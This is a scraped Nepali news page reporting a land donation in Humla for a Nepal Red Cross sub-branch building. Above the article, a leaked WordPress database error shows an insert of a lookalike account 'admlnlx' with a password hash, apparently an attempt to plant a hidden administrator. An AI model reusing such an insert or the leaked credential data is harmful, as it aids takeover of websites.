WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrAvsKHz0yODHQPddtC8c.2hG0ulSP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:56:41', '', 'admlnlx', 'admlnlx')

रेडक्रसका लागि जग्गादान – Gaule Khabar

रेडक्रसका लागि जग्गादान

रेडक्रसका लागि जग्गादान

कचहरी डट कम, हुम्ला ।।

नेपाल रेडक्रस सोसाइटी, सर्केगाड उपशाखाको भबन निर्माणका लागि सायाँ गाउँ विकास समिति वडा नं १, मण्डी गाउँका स्थायी निकासी सर्वश्री भिम बहादुर सिंहर र उक्त गाविस वडा नं १ मण्डी गाउँ बस्ने भै बहादुर सिंहले करीब तीन लाख बराबरको जग्गादान गर्नुभएको छ ।

यसका लागि सहजीकरण तथा पहल गर्नुहुने सायाँ गाउँका अगुवा श्री प्रेम बहादुर शाही र उक्त गाउँका शिक्षक सिंह फडेरालाई पनि धन्यवाद छ । उक्त जग्गा नेरेसो जिल्ला शाखाका कार्य समिति सदस्य कर्ण बहादुर रोकाया, कोषाध्यक्ष हरी बहादुर रावत र स्वयसेवक नैनसिंह रावत र भक्त राज ऐडी लगायत स्थानीय जानमानको रोहवरमा जग्गादान गर्नुहुने महानुभावहरुलाई धेरै धेरै धन्यवाद छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका